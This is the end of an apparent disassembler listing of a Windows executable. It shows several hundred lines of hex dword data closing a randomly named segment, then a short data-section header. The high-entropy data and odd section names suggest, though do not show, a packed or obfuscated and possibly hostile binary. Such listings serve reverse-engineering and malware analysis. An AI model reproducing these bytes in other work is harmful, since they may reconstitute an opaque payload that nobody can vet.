		dd 4FDD9DE4h, 532BE7EDh, 0CBED3930h, 98D36F38h,	0B3B5A7AFh
		dd 744EDAC1h, 81A2316h,	0D0CF532Eh, 5F8F29F2h, 0BC2C044Ah
		dd 0EA0BD286h, 75481063h, 234193D7h, 40D2E2E4h,	979C1048h
		dd 5B8F9A13h, 0CD2E139Eh, 0CC129153h, 0F0D4D868h, 3397DF76h
		dd 5E5FAA56h, 0D87C3DDEh, 79B05DFDh, 0C43468F0h, 523BE97Fh
		dd 7AA1B3BCh, 0F5CF0C43h, 0EE9320A6h, 49725B9Fh, 3BD64093h
		dd 0D480DC2Eh, 0E0FB97F5h, 5D8D00C6h, 0E2BBA867h, 0EC6DD081h
		dd 0D969CD08h, 8BE09FFDh, 309E4464h, 2E0842F4h,	0A7673CBAh
		dd 7B6D7A92h, 0F38AD59Ch, 1ECD282Dh, 0EF8C9FBBh, 438768EDh
		dd 0AC84DF94h, 0D65F3B67h, 0ABF05430h, 0F1EF49A2h, 5E30ABD8h
		dd 393D3D3Ch, 3BE18F9Fh, 8D70F2D2h, 0C4CC323Fh,	2C229A21h
		dd 0E59A1CD8h, 0DC214FCAh, 0F41807DEh, 3487AEEFh, 7BD8D408h
		dd 0BAA134Eh, 0DCAAA126h, 4A9A593Fh, 59C2A772h,	4E6B248Bh
		dd 0F0815215h, 54362480h, 9BA9BFA9h, 0A0F152BCh, 0CA4C4276h
		dd 97ECB621h, 0BE97A0E7h, 0F5BCF80Dh, 0C13F650Bh, 6742DBBFh
		dd 67378359h, 159FE749h, 45724AD5h, 0EEBE2733h,	385CA966h
		dd 9ED0DEDFh, 70E10AAh,	7566C24Eh, 1EA29041h, 14963487h
		dd 0B572D24Ah, 67005CC1h, 256E018Eh, 0F37486B7h, 0EAED3925h
		dd 0A371A5C6h, 70B2910Fh, 0F165B8A4h, 32A1E328h, 0EBE24B3Ah
		dd 9EE4AA7Ah, 0F1EFA1F7h, 25F519A0h, 0E5C689C8h, 0DAEF137Ah
		dd 413723Dh, 0FE7CF75Fh, 46BFDC83h, 0CF03E6EBh,	0FAC74393h
		dd 9B510245h, 0EA07B313h
		dd 141C2416h, 0E24CDDE4h, 0ED7012ADh, 55C9FEF8h, 0D57BA075h
		dd 3FE4E0C3h, 0AE4166A0h, 2916D9D3h, 3DC90CEAh,	0A1CE76B5h
		dd 0CAE83858h, 62B56A3Bh, 0E8B42435h, 0A8E883B9h, 6D2D1B14h
		dd 0BB071E8Ch, 0CE7F3AA8h, 4335CFEEh, 0FBD375E9h, 49AE85CAh
		dd 9D0FB3EFh, 0A9CD8C1Ch, 0FAF8D2B5h, 1B0B386Dh, 0DF2415C0h
		dd 50AF5DFEh, 5254E24h,	92DF72C3h, 9FC9676Ah, 0DDA9E072h
		dd 3159682Dh, 0BA379425h, 5F19F798h, 0DE6D6A81h, 0C42B423Fh
		dd 0CCED931Bh, 6A672CA6h, 7C1941BAh, 0A72262CCh, 0CD7144EFh
		dd 3FB112EDh, 58CBD756h, 3C9ED7EAh, 0A311FA74h,	0F8A9D5C6h
		dd 863FFD6Ch, 344E9CA0h, 0BC7BB422h, 0B4E768D1h, 9123C2FEh
		dd 765899A7h, 9BD8E830h, 0B85B1633h, 0FDC07A1Fh, 98BDC143h
		dd 0B16ABF3Fh, 6A9679E1h, 6CD71F48h, 4581473Bh,	866AF711h
		dd 0AB86273Bh, 7CCB9DF4h, 8B835DEBh, 9806209Ah,	2AF09920h
		dd 7F2E53A4h, 0BD6F778Dh, 39129989h, 0C146A896h, 0E52EAB1Bh
		dd 0E61F86B5h, 0F07F9B15h, 0DA3F5717h, 0AD567A4Ch, 0F54B410Eh
		dd 61ED460Ch, 0D28D1322h, 0A92B7F4Bh, 0C4BD470Dh, 0A84101C9h
		dd 592DFB47h, 94BD0971h, 9D24E108h, 0B2413690h,	922D9B31h
		dd 3BBB04A6h, 0E8A2856Eh, 0B0446A1Ch, 0C779DBAFh, 0C3C7664Ah
		dd 0F8FFCBDEh, 0B0B0C333h, 0CC7BBE18h, 6A0C0A13h, 6A96EB77h
		dd 47A6793h, 0C0871216h, 0F9FDAC3Dh, 0CB22A87Eh, 6E845A1h
		dd 0B731CC73h, 0F1A92E82h, 9EEC6338h, 0AFA90847h, 13D140DBh
		dd 95D72CAEh, 313AA648h, 86926789h, 0A39689F8h,	8953BBDCh
		dd 1811631Dh, 83409DCFh, 0E3BB219Bh, 0D5052E38h, 785E2A9h
		dd 0C75B3F27h, 0B60B31E1h, 32B12485h, 4434522Ah, 29E05D5Bh
		dd 30683BE3h, 2507E8FBh, 313D6407h, 0D3FD89B3h,	8A60950Ch
		dd 7B3EC05Dh, 0D3672C45h, 4431CEC6h, 4CCACEFBh,	9F809690h
		dd 1C440656h, 0AB1EA3C5h, 9709D022h, 89A98C74h,	0C55357C2h
		dd 73DAC28Eh, 64025A03h, 914CDEECh, 603DDAB5h, 33515C6Ch
		dd 0FF59A1D5h, 0CE417A67h, 0E2F7811Bh, 4C81A4EFh, 341E90D6h
		dd 6B82B39Ah, 0BB9CF658h, 0CA77FC6Fh, 3A5B8339h, 8722C3CBh
		dd 10630C34h, 7BC9686Ch, 0C4DF3B5h, 0BC3651F7h,	0DE969644h
		dd 0E5E64049h, 0DB4ECE20h, 0EF509A62h, 0CF1325C0h, 0E347D935h
		dd 3B34202Dh, 90E772C3h, 0EE9A455Eh, 5467D83Fh,	0B8C0A00Bh
		dd 0EC127481h, 4516151Ch, 0D7FEE926h, 87F4592Fh, 1947D7F7h
		dd 9C1D1D07h, 0E17C3C85h, 0C66A3A18h, 69097CB2h, 11A2D7F7h
		dd 0A25A184Ah, 0C5133B9Dh, 3C1FFF08h, 53CFDE47h, 0C85B861Bh
		dd 7FCDC1E9h, 9DEDACDCh, 0BD8C3056h, 934C2234h,	144CE48h
		dd 21BAEFF7h, 1EE1790Ch, 66E6D557h, 242DCE51h, 660F3E63h
		dd 583132B6h, 80B210Eh,	0B4AD9F63h, 923DA671h, 0F98862D7h
		dd 2E7EDD8Ch, 0FD9EB6FBh, 20562F8Eh, 6C579640h,	0D134D37Bh
		dd 22165E3Ah, 95AECD62h, 0C6ADFD2Ch, 916E31A3h,	0A111F3FDh
		dd 0B5A793D6h, 8CDFF253h, 0BA71BE34h, 0BD9831E2h, 0FFA5B097h
		dd 3641B937h, 0A07183F0h, 75993C19h, 49EC33CCh,	0E1CA4FC0h
		dd 0A567CB51h, 8783A540h, 0BE0B4518h, 785EC612h, 2353F3EDh
		dd 0AC69AF61h, 9CA39FD8h, 0FEC7CFAEh, 0FC0D3EEEh, 0EF18FA82h
		dd 96FD1A09h, 345D0CBFh, 994851B9h, 408D27D4h, 80BCEAE4h
		dd 0B2AEBBFEh, 1D308C14h, 66C71628h, 0FDAF9072h, 0F4CECFE7h
		dd 0CC5EEEBEh, 33FD1A6Eh, 4A2E0AD9h, 0E4DDAAAAh, 4BFCD54Fh
		dd 50CA6611h, 0EE771A09h, 0FAF6AA93h, 0CD547F2Bh, 8536BE8Ah
		dd 21B34EFFh, 7DF8A4A2h, 270CA8C9h, 0AEA4523Fh,	7C45EDF7h
		dd 517C9D25h, 0C592445Eh, 10789B0Ah, 179EFECBh,	0F4E61A0Eh
		dd 0EB0B8955h, 76274B63h, 0F00E5BBDh, 0D1FE21A5h, 17937BF3h
		dd 950FAB8Dh, 90A2A4F8h, 0BFA1108Eh, 0F07491AAh, 7FEE6346h
		dd 0CFF4B800h, 71A91DB1h, 15407285h, 2E9CC4BCh,	0B1F66AF5h
		dd 0CAB894D9h, 3CAB48FBh, 0FFC883CAh, 0B0F64052h, 18A9E456h
		dd 0CED9D876h, 0D90509A2h, 0DCD4564h, 6849A742h, 975F0CAh
		dd 87D57B42h, 0BD6B6105h, 0E54FD3A8h, 0AA2FFE7Fh, 5E632AC1h
		dd 27E64316h, 2E70F35Fh, 0D2314B75h, 9FAD476Fh,	7AB6CB62h
		dd 0C01C26A9h, 57AA7B80h, 0FCF464Eh, 0D4885AFDh, 7DC2159Ah
		dd 52CFC85Eh, 541401EBh, 0F51AB9DEh, 8F405FDh, 8987526Fh
		dd 0F740D363h, 0D4AA23A8h, 0B3F3C146h, 86C17C5Ah, 8B969B58h
		dd 2EE9F6A3h, 8E448987h, 9C89D3BBh, 8F58E5CEh, 37BE7BEDh
		dd 0C6C779DCh, 3F537513h, 677CF960h, 2DE506B9h,	6AB5C0CBh
		dd 6FBF4310h, 0E2F96BACh, 50064B27h, 0A00D7A3Dh, 9B4D4044h
		dd 81B84F38h, 3B8817A0h, 63AC6E7h, 3D444A88h, 7F1C9589h
		dd 7B634846h, 3AACEB2Bh, 0B4C39FDAh, 22D8687Ch,	0B4690247h
		dd 0E7C4AA2Bh, 0B4957475h, 0FBCD611Ah, 0C6F530DFh, 0B7C9BE45h
		dd 0E4A8E4BDh, 14B340FFh, 0B51E51F0h, 0FAFC99CAh, 0AFB9BD9Eh
		dd 3336E7F6h, 62AD82Ah,	926147DBh, 0D5DE9E6Eh, 0C3B74BC8h
		dd 0B107E54Ch, 0C9A0C0B9h, 0A87FE0F2h, 4175E713h, 9B15B67h
		dd 0D9497284h, 0EB5A5B08h, 0B14C272Ah, 309BF0Ah, 340D8768h
		dd 5D801D3Fh, 98408068h, 3320070Fh, 4F508BEBh, 922F6C85h
		dd 18AA8A56h, 3BD8C374h, 1E8F9A8Ah, 0FF2F310Dh,	4A100B8h
		dd 0E120DF3Bh, 487FA54Ch, 5BB69E12h, 0A6D1C671h, 6A76F7F9h
		dd 0F0726D5Ch, 587BD15Bh, 9FCA39CDh, 52C88587h,	0C3AAD09h
		dd 602EE3BCh, 0B29F11CDh, 8AC45730h, 9D0ED242h,	0AB8003DFh
		dd 8E01711Dh, 0F2EC9F4Bh, 6CA874A4h, 4298AEF5h,	0DDCD8DF1h
		dd 0D6F6CC87h, 7292D128h, 0D7EEF131h, 0DC62992Ah, 0DBAA7998h
		dd 0CC2E3B4Ch, 93233671h, 3CFD06CAh, 0C0A32DB0h, 3563AB88h
		dd 0E539557h, 0D08BFE7Ah, 0FE1F4C5Ah, 0DDE6A329h, 70487AE2h
		dd 4F318BBh, 13A93D5Eh,	62FB82C3h, 9E95F050h, 9475B490h
		dd 0B19504D7h, 0E03F30EBh, 2D2E5F82h, 1FC196C6h, 0EF83CC63h
		dd 84CA3A28h, 0C3DC440Fh, 0E4982E27h, 942BE425h, 35B43632h
		dd 0E0FC4EE7h, 0DDB8D047h, 0C9E91E8Dh, 0D0F7625Fh, 5F52E638h
		dd 0CEE52F51h, 1D12D550h, 9BAF417Ch, 0BF362634h, 8376925Dh
		dd 0F31F7DAFh, 2FCDCF85h, 0D057AFAAh, 0D9169C78h, 414A772Fh
		dd 6C20DE5Ch, 11C5F59Bh, 95C70936h, 0D24940AEh,	0A8BED2B1h
		dd 0F33245ECh, 0F928486Fh, 9B6F512Fh, 0E0E1CCE7h, 465B8BC2h
		dd 4D8D8021h, 2BAE1895h, 219488BCh, 0BF382136h,	9F167B4Fh
		dd 1ADF549Fh, 30D99306h, 54BFCE8Eh, 4899E703h, 2C4C81C9h
		dd 55987CE8h, 0E7048D7Ah, 0BF4E4950h, 0E7B018D1h, 0C24639DFh
		dd 0AEE62EBDh, 23FE5D1Eh, 0C330A07Dh, 77DAF828h, 0DA0FC2D8h
		dd 71F73579h, 5AB5E643h, 73A4298Ch, 0E4DFFC4Eh,	0B3F2A50Ch
		dd 0DDECD007h, 9333AB12h, 46B02CBAh, 5E636137h,	9ECD2A08h
		dd 78D73B9Dh, 0DF88F30Fh, 0A2F16F84h, 0ED5D992Dh, 5E1EBD1Eh
		dd 935195E2h, 5989CA52h, 9416DDAFh, 0D83FC517h,	0A5E61065h
		dd 673341C3h, 0BC765242h, 0CFDE15B4h, 5BA7ED2Bh, 3B8920E2h
		dd 6AFE9E02h, 3174A980h, 0A6874EEEh, 160A39C2h,	27E9A367h
		dd 0DDCCEC0h, 0BF864F6Ah, 973A7DFDh, 0ED4173AFh, 0F683FDA4h
		dd 8EAF97C8h, 4991D5F3h, 3A0AA840h, 0E3404D52h,	0B2472EF2h
		dd 16C83A10h, 9C4B2A5Dh, 47AE18ABh, 5502AE9Ah, 4B200A16h
		dd 0C4D7F51Ch, 4A3C81A5h, 8C4321B3h, 9C8C27BBh,	0FBCFCF48h
		dd 31D6E728h, 0EC6AA0C0h
_1t0hzn25	ends

; Section 9. (virtual address 00090000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00090000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 490000h
		dd 17h dup(0)
dword_49005C	dd 69h dup(0)		; DATA XREF: zcrshv4o:0041FFC8o
					; zcrshv4o:0041FFE4o
		align 1000h
_idata2		ends


		end start